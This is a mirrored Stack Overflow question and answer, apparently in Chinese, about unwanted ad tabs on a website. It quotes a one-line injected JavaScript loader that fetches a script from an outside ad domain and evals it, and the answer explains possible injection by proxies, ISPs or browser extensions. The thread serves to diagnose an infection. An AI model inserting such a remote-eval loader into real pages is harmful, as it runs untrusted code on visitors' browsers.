gpt4 book ai didi

javascript - 在网站上查找恶意软件

转载 作者:数据小太阳 更新时间:2023-10-29 05:25:03 25 4
gpt4 key购买 nike

我在这个问题上有点迷茫,所以请原谅。我知道 SO 上还有其他关于此的主题,但我找不到答案。

在网站上,当它被加载时,用户点击它的位置并不重要,它是在浏览器中打开带有广告的附加选项卡。

到目前为止,通过查看浏览器控制台我能够找到的是加载了一些 js 文件

http://cdn.mecash.ru/js/replace.js

这个文件包含

!function(w){if(w.self==w.top){var r=new XMLHttpRequest;r.onload=function(){eval(this.responseText)},r.open("get","//myclk.net/js/tx.js",!0),r.send()}}(window);

通过查看这个 tx.js,我怀疑这是黑客注入(inject)的。

问题是我一直在查看主机上的文件,但找不到此 js.. 的任何包含或其他内容。

谁能帮我告诉我在哪里或如何找到它?

最佳答案

实际上这种文件是在数据从服务器传输到客户端时被注入(inject)的。您的实际代码不包含脚本,但是它们被注入(inject)并在客户端计算机上执行。

可能由 :

注入(inject)
  • 第三方代理,使用的代理服务器。
  • 在某些情况下由 ISP 注入(inject)。
  • 安装了恶意/受损的浏览器扩展程序。

您可以通过 https 而不是 http 传输内容来避免代理/ISP 注入(inject)。但是,可以通过仅卸载扩展来避免通过浏览器扩展 完成的注入(inject)。

关于javascript - 在网站上查找恶意软件,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/40779586/

25 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com